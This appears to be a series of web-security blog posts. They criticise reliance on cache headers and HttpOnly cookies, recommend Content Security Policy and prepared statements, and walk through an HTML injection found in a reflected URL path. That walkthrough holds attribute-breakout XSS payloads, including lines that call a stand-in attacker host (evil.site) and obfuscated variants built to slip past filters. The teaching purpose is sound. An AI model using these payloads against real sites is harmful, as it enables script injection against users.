If you consider some content sensitive enough to start worrying about its security, you shouldn’t be serving it over HTTP in the first place. Ostensibly, the danger of allowing the browser to cache the content is that someone with access to the browser’s system can pull the page from disk. It’s a lot easier to sniff the unencrypted traffic in the first place. Skipping network-based attacks like sniffing and intermediation to focus on client-side threats due to cacheing ignores important design problems — especially in a world of promiscuous Wi-Fi.

Then you have to figure out what’s sensitive. Sure, a credit card number and password are pretty obvious, but the answer there is to mask the value to avoid putting the raw value into the browser in the first place. For credit cards, show the last 4 digits only. For the password, show a series of eight asterisks in order to hide both its content and length. But what about email? Is a message sensitive? Should it be cached or not? And if you’re going to talk about sensitive content, then you should be thinking of privacy as well. Data security does not equal data privacy.

And if you answered those questions, do you know how to control the browser’s cacheing algorithm? Are you sure? What’s the recommendation? Cache controls are not as straightforward as they seem. There’s little worth in relying on cache controls to protect your data from attackers who’ve gained access to your system. (You’ve uninstalled Java and Flash, right?)

Browsers used to avoid cacheing any resource over HTTPS. We want sites to use HTTPS everywhere and HSTS whenever possible. Therefore it’s important to allow browsers to cache resources loaded via HTTPS in order to improve performance, page load times, and visitors’ subjective experiences. Handling sensitive content should be approached with more care than just relying on headers. What happens when a developer sets a no-cacheing header, but saves the sensitive content in the browser’s Local Storage API?
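
When a page truly merits cache suppression (served over HTTPS, of course), the headers themselves are the easy part. One conventional belt-and-suspenders combination, expressed in PHP:

<?php
header('Cache-Control: no-store, no-cache, must-revalidate');
header('Pragma: no-cache'); // for stray HTTP/1.0 intermediaries
header('Expires: 0');
?>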

HttpOnly Is Pretty Vacant

Web apps litter our browsers with all sorts of cookies. This is how some companies get billions of dollars. Developers sprinkle all sorts of security measures on cookies to make them more palatable to privacy- and security-minded users. (And weaken efforts like Do Not Track, which is how some companies keep billions of dollars.)

The HttpOnly attribute was proposed in an era when security documentation about HTML injection attacks (a.k.a. cross-site scripting, XSS) incessantly repeated the formula of attackers inserting <img> tags whose src attributes leaked victims’ document.cookie values to servers under the attackers’ control. It’s not wrong to point out such an exploit method. However, as Stephen King repeated throughout the Dark Tower series, “The world has moved on.” Exploits don’t need to be cross-site, they don’t need <script> tags in the payload, and they surely don’t need a document.cookie to be effective.

If your discussion of cookie security starts and ends with HttpOnly and Secure attributes, then you’re missing the broader challenge of designing good authorization, authentication, and session handling mechanisms. If the discussion involves using the path attribute as a security constraint, then you shouldn’t be talking about cookies or security at all.

HttpOnly is a cheap attribute to throw on a cookie. It doesn’t prevent sniffing — use HTTPS everywhere for that (notice the repetition here?). It doesn’t really prevent attacks, just a single kind of exploit technique. Content Security Policy is a far more essential countermeasure. Let’s start raising awareness about that instead.
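
A starting-point policy costs a single header. This minimal example (adjust the sources to your app’s needs) forbids inline script and eval, which blunts whole classes of HTML injection exploits rather than one exfiltration trick:

<?php
header("Content-Security-Policy: default-src 'self'; object-src 'none'");
?>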

Problems

Easy security measures aren’t useless. Prepared statements are easy to use and pretty soundly defeat SQL injection; developers just choose to remain ignorant of them.
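
For reference, here’s what that ease looks like with PHP’s PDO; the connection details are placeholders. The query’s grammar is fixed before any data arrives, so the parameter can’t rewrite the SQL:

<?php
$pdo = new PDO('mysql:host=localhost;dbname=app', 'user', 'password');
$stmt = $pdo->prepare('SELECT name FROM products WHERE id = ?');
$stmt->execute(array($_GET['id']));
$row = $stmt->fetch(PDO::FETCH_ASSOC);
?>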

This month be extra wary of cheap security scenery and stale recommendations that haven’t kept up with the modern web. Ask questions. Look for tell-tale signs, like recommendations that

  • fail to clearly articulate a problem with regard to a security or privacy control (e.g. ambiguity in what the weakness is or what an attack would look like)
  • fail to consider the capabilities of an attack (e.g. filtering script and alert to prevent HTML injection)
  • do not provide clear resolutions or do not provide enough details to make an informed decision (e.g. can’t be implemented)
  • provide contradictory choices of resolution (e.g. counter a sniffing attack by applying input validation)

Oh well, we couldn’t avoid a list forever.

Never mind that. I’ll be back with more examples of good and bad. I can’t wait for this month to end, but that’s because Halloween is my favorite holiday. We should be thinking about security every month, every day. Just like the song says, Everyday is Halloween.

On a Path to HTML Injection

URLs guide us through the trails among web apps. We follow their components — schemes, hosts, ports, querystrings — like breadcrumbs. They lead to the bright meadows of content. They lead to the dark thickets of forgotten pages. Our browsers must recognize when those crumbs take us to infestations of malware and phishing.

Trail Ends

And developers must recognize how those crumbs lure dangerous beasts to their sites.

The apparently obvious components of URLs (the aforementioned origins, paths, and parameters) entail obvious methods of testing. Phishers squat on FQDN typos and IDN homoglyphs. Other attackers guess alternate paths, looking for /admin directories and backup files. Others deliver SQL injection and HTML injection (a.k.a. cross-site scripting) payloads into querystring parameters.

But URLs are not always what they seem. Forward slashes don’t always denote directories. Web apps might decompose a path into parameters passed into backend servers. Hence, it’s important to pay attention to how apps handle links.

A common behavior for web apps is to reflect URLs within pages. In the following example, we’ve requested a link, https://web.site/en/dir/o/80/loch, which shows up in the HTML response like this:

<link rel="canonical" href="https://web.site/en/dir/o/80/loch" />

There’s no querystring parameter to test, but there’s still plenty of items to manipulate. Imagine a mod_rewrite rule that turns ostensible path components into querystring name/value pairs. A link like https://web.site/en/dir/o/80/loch might become https://web.site/en/dir?o=80&foo=loch within the site’s nether realms.
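
A hypothetical rule for that sort of translation might look like this in Apache’s mod_rewrite (the parameter names are invented to match the example):

RewriteRule ^en/dir/o/(\d+)/(\w+)$ /en/dir?o=$1&foo=$2 [L]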

We can also dump HTML injection payloads directly into the path. The URL shows up in a quoted string, so the first step could be trying to break out of that enclosure:

https://web.site/en/dir/o/80/loch%22onmouseover=alert(9);%22

The app neglects to filter the payload although it does transform the quotation marks with HTML encoding. There’s no escape from this particular path of injection:

<link rel="canonical" href="https://web.site/en/dir/o/80/loch&quot;onmouseover=alert(9);&quot;" />

However, if you’ve been reading here often, then you’ll know by now that we should keep looking. If we search further down the page a familiar vuln scenario greets us. (As an aside, note the app’s usage of two-letter language codes like en and de; sometimes that’s a successful attack vector.) As always, partial security is complete insecurity.

<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=alert(9);"?kosid=80&type=0&step=1">Deutsch</a>
</div>

We probe the injection vector and discover that the app redirects to an error page if characters like < or > appear in the URL:

Please tell us (us@web.site) how and on which page this error occurred.

The error also triggers on invalid UTF-8 sequences and NULL (%00) characters. So, there’s evidence of some filtering. That basic filter prevents us from dropping in a <script> tag to load external resources. It also foils character encoding tricks to confuse and bypass the filters.

Popular HTML injection examples have relied on <script> tags for years. Don’t let that limit your creativity. Remember that the rise of sophisticated web apps has meant that complex JavaScript libraries like jQuery have become pervasive. Hence, we can leverage JavaScript that’s already present to pull off attacks like this:

https://web.site/en/dir/o/80/loch"onmouseover=$.get("//evil.site/");"

<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=$.get("//evil.site/");"?kosid=80&type=0&step=1">Deutsch</a>
</div>

We’re still relying on the mouseover event and therefore need the victim to interact with the web page to trigger the payload’s activity. The payload hasn’t been injected into a form field, so the HTML5 autofocus/onfocus trick won’t work.
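
For reference, that trick applies when the reflection point sits inside an <input> tag’s attribute, where a payload like this fires without any user interaction:

"autofocus onfocus=alert(9) x="

<input type="text" value=""autofocus onfocus=alert(9) x="">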

We could further obfuscate the payload in case some other kind of filter is present:

https://web.site/en/dir/o/80/loch"onmouseover=$["get"]("//evil.site/");"
https://web.site/en/dir/o/80/loch"onmouseover=$["g"%2b"et"]("htt"%2b"p://"%2b"evil.site/");"

Parameter validation and context-specific output encoding are two primary countermeasures for HTML injection attacks. The techniques complement each other; effective validation prevents malicious payloads from entering an app, correct encoding prevents a payload from changing a page’s DOM. With luck, an error in one will be compensated by the other. But it’s a bad idea to rely on luck, especially when there are so many potential errors to make.

Two weaknesses enable attackers to shortcut what should be secure paths through a web app:

  • Validation routines must be applied to all incoming data, not just parameters. Form fields and querystring parameters may be the most notorious attack vectors, but they’re not the only ones. Request headers and URL components are just as easy to manipulate.
  • Blacklisting often fails because developers have a poor understanding of, or a limited imagination for, crafting exploits. Even worse are filters built solely from observing automated tools, which leads to naive defenses like blocking alert or <script>.

Output encoding must be applied consistently. It’s one thing to have designed a strong function for inserting text into a web page; it’s another to make sure it’s implemented throughout the app. Attackers are going to follow these breadcrumbs through your app. Be careful, lest they eat a few along the way.

Hacker Halted US 2013 Presentation

Hacker Halted 2013 Badge

What a joy to visit Atlanta twice in one month! First DragonCon, now Hacker Halted. I operated on about the same amount of sleep for both events, but at least at HH I only waited once for an elevator at the Hilton.

And once again I’ll be leaving this great city with sci-fi goodies. This time around it’s a Star Trek USB drive that Hacker Halted kindly handed out to their speakers.

This is likely the final time I’ll present the JavaScript & HTML5 Security slide deck that I’ve been tweaking over the past year. (Although there’s plenty of material to translate into posts and interactive examples once some elusive free time appears.) It’s time to focus on different aspects of those technologies and different topics altogether. For example, I’ve recently been revisiting CSRF with an eye towards proposing new mechanisms to defeat it.

Next up is putting together CSRF lab content for HITB Malaysia this October. And, of course, making hotel reservations for a return to Atlanta — DragonCon 2014 awaits!